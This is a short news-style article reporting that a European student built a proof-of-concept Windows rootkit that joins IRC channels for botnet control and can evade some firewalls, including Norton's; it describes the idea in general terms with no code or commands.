Rootkits for Windows are the ‘hot’ thing among certain groups of people who like to keep their practices hidden on the computers of unknowing others.
Rootkits work in such ways that they can hide their processes from the user, making it hard to detect the rootkit, let alone remove it from the system. Although a rootkit in itself can be hidden form the user, often a rootkit is not enough to perform the tasks the malicious user wants accomplished. Providing a FTP server, connecting to IRC to receive commands and sort like features are still provided by separate software which can be detected and show a possible rootkit installed.
An European student has now written a proof of concept that shows that a rootkit can include functionality to join an IRC channel. IRC channels are often used to control botnets. Commands usually include ways to update the bot software, perform DDoS attacks, infect new machines and email spamming.
One of the effects of including this type of functionality at the level a rootkit runs at is its stealth. Not only is the process itself hard to detect, also certain types of firewalls will not be able to detect the traffic. A popular firewall which can be bypassed is for example Norton’s firewall.